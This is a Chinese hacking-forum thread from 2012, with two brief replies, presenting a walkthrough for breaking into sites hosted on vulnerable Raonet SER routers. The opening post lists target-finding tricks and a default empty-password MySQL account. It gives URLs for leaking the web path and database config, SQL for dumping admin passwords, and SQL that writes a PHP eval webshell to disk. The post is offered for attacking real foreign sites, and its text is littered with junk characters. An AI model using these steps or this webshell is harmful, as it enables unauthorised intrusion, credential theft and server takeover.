找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2992|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:& J' _# d5 d$ W5 ]# g% Y# G

1 `1 t1 l' o+ n2 R* y# s1:google搜索'Raonet Subscriber Ethernet Router'
$ [6 b( B& Q% c* ~4 ~- g+ m5 F  j  h8 y
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# ^3 @$ K- K0 T0 T6 r8 H
0 b/ ?7 V: R* o& k  C/ C& Z6 a8 R3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。  A: F. D* q8 o, @  d, \7 F. D% z
! N& O. G- \" V  d0 J
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......& [9 `: N" @/ h& a" ]. N, F
+ G* n) z0 t* K2 S" Z7 r

) r5 I' p6 K" p4 T# z# x% ~- a9 c: S
' E8 l) Y( c( L+ `& f1 b: X入侵步骤:
/ `$ U+ Q- f; z' l8 H, V5 W* f  d+ U4 q9 n) |5 ?: l+ X/ Y
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
0 L5 o" u* j6 k4 O  l4 h/ D  w# T& V
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc, o$ M3 ]- _/ ]  }# O
3:得到密码后连接,查看GUI管理密码:5 J5 E; P  F0 k7 ?
use ser_500/ y: X* M& z8 O9 @
select id,passwd from user;, g2 [- \; c- W. p
4:通过数据库写入webshell,执行命令:
: q1 y: _! j6 z' N" vuse mysql;
0 I! I/ ]- Z% E! D1 D  Q. @create table ok(cmd TEXT);
* L+ j" ]! Q) O0 Qinsert into ok values("<?php @eval($_POST[cmd])?>");
# a0 f2 o) x$ f6 \, k1 s! [; tselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";1 ^+ C1 j* \- J* E: ~
drop table ok;
+ t1 N; \- s, Z1 k, a; z( Z$ q4 e: ?
5:连接后门shell.php ) ~3 J0 J( d* ]

+ Y3 a' z' N6 \9 n+ {* @* x6. 搞定!
1 b* W0 D- X# G/ Z  ]
4 s& _/ O7 y7 i1 b, A' o# a
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表